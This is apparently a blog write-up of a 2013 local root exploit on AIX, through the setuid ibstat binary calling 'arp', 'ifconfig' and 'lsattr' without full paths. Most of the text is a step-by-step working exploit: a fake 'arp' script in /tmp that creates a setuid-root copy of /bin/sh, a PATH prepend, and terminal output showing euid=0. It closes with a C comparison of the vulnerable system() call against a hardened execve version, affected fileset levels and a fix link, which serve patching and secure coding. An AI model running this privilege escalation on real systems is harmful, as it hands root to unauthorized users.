In July 2013 we saw a new vulnerability on AIX: it allows local users to gain root privileges in a very simple way.
The flaw is due to a programming error in the ibstat command.
(futex@aixbox) $ which ibstat
/usr/bin/ibstat
(futex@aixbox) $ ls -l /usr/bin/ibstat
lrwxrwxrwx   1 root    bin             16 01 oct 02:18 /usr/bin/ibstat -> /usr/sbin/ibstat
(futex@aixbox) $ ls -l /usr/sbin/ibstat
-r-sr-xr-x   1 root    bin          47388 12 nov 2012 /usr/sbin/ibstat
After following the symlink, the real binary is /usr/sbin/ibstat, and it has the setuid bit set!
With a simple strings command, we can see which external commands the binary calls:
(futex@aixbox) $ strings /usr/sbin/ibstat | grep ifconfig
ifconfig %s
(futex@aixbox) $ strings /usr/sbin/ibstat | grep arp
arp -t ib -a
(futex@aixbox) $ strings /usr/sbin/ibstat | grep lsattr
lsattr -El %s
As we can see, none of these commands is called with its full path, so the binary can be exploited easily.
We place ourselves in the tmp directory:
(futex@aixbox) $ cd /tmp
Then we create a script named after one of the commands used by the ibstat binary; its only job is to copy the shell binary to /tmp and set the setuid bit on it:
(futex@aixbox) $ vi arp
#!/bin/sh
cp /bin/sh /tmp/root
chown root /tmp/root
chmod 4755 /tmp/root
Don't forget to set the executable bit on the script:
(futex@aixbox) $ chmod 755 ./arp
Next, we prepend the current directory to the PATH environment variable:
(futex@aixbox) $ PATH=.:${PATH}
(futex@aixbox) $ which arp
./arp
And launch the ibstat command:
(futex@aixbox) $ ibstat -a -i en0
ERROR: "/dev/en0": open failed rc=2, errno=2
Check device state of "icm" and "en0".
===============================================================================
IB INTERFACE ARP TABLE
===============================================================================
The /tmp/arp script is launched by the ibstat command; since ibstat is root-owned and setuid, it executes with root privileges, so our script runs with root privileges too 🙂
(futex@aixbox) $ ls -l /tmp/root
-rwsr-xr-x   1 root    sys         292606 14 oct 10:48 /tmp/root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys)
(futex@aixbox) $ ./root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys) euid=0(root)
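The strings found above (arp -t ib -a, ifconfig %s, lsattr -El %s) are the signature of a setuid program handing a bare command name to a shell. As an added illustration, not IBM's ibstat source, here is that pattern beside a hardened replacement; the names run_arp_vulnerable and run_fixed and the /usr/sbin/arp path are assumptions for the demo.

```c
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern: system() passes the string to /bin/sh, which resolves
 * "arp" through the caller's PATH. In a setuid-root program the unprivileged
 * caller therefore chooses which "arp" runs as root. Kept only for contrast;
 * never call this from privileged code. */
int run_arp_vulnerable(void)
{
    return system("arp -t ib -a");
}

/* Hardened replacement (hypothetical name run_fixed):
 *  - refuses anything that is not an absolute path,
 *  - uses execve() with an argv vector, so no shell parses the command line,
 *  - supplies a fixed, minimal environment, so PATH, IFS and LD_* variables
 *    set by the caller never reach the child.
 * Returns the child's exit status, or -1 on error. */
int run_fixed(const char *path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/usr/sbin", NULL };
    int status;
    pid_t pid;

    if (path == NULL || path[0] != '/')
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, clean_env);
        _exit(127);               /* exec failed: same convention as the shell */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Stand-alone demo: run arp the safe way (path assumed for the demo;
 * /usr/sbin/arp is where AIX installs it). */
int main(void)
{
    char *const argv[] = { "arp", "-t", "ib", "-a", NULL };
    int rc = run_fixed("/usr/sbin/arp", argv);
    return rc < 0 ? 1 : rc;
}
```

The same rule applies to the ifconfig and lsattr calls: an absolute path, an argv vector, and a sanitized environment, so that nothing under the caller's control decides what the setuid process executes.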
The ibstat command ships in the devices.common.IBM.ib.rte fileset.
The following fileset levels are vulnerable:
AIX Fileset                 Lower Level   Upper Level
-------------------------------------------------------
devices.common.IBM.ib.rte   6.1.6.0       6.1.6.21
devices.common.IBM.ib.rte   6.1.7.0       6.1.7.18
devices.common.IBM.ib.rte   6.1.8.0       6.1.8.15
devices.common.IBM.ib.rte   7.1.0.0       7.1.0.21
devices.common.IBM.ib.rte   7.1.1.0       7.1.1.18
devices.common.IBM.ib.rte   7.1.2.0       7.1.2.15
You must upgrade your system or install the fix:
ftp://aix.software.ibm.com/aix/efixes/security/infiniband_fix.tar
Rock it!